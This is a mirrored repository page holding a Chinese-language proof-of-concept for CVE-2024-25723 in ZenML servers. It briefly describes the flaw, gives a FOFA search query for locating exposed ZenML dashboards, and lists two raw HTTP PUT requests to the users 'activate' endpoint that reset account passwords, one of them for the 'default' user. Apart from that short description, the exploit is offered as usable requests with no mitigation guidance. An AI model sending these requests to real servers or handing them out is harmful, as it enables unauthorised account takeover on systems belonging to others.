admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-07-29 14:04:06 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/ZenML/ZenML服务器远程权限提升漏洞(CVE-2024-25723).md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

39 lines
1020 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

## ZenML服务器远程权限提升漏洞(CVE-2024-25723)
ZenML服务器远程权限提升漏洞CVE-2024-25723存在于Python的0.46.7之前的ZenML机器学习包中的ZenML服务,漏洞源于/*/{user_name_or_id}/activate REST API 端点允许基于有效用户名和请求正文中的新密码进行访问可导致未授权用户远程权限提升可直接重置任意ZenML账户密码。
## fofa
```
title=="ZenML - Dashboard"
```
## poc
```
PUT /api/v1/users/*/activate HTTP/1.1
Host:
User-Agent: python-requests/2.28.1
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: close
Content-Type: application/json
Content-Length: 31
{"password": "Ldwk@20240426"}
PUT /api/v1/users/default/activate HTTP/1.1
Host:
User-Agent: python-requests/2.28.1
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: close
Content-Type: application/json
Content-Length: 31
{"password": "Ldwk@20240426"}
```
![image](https://github.com/wy876/POC/assets/139549762/698ab566-b17e-48c0-954d-1dd21f795405)
Reference in New Issue View Git Blame Copy Permalink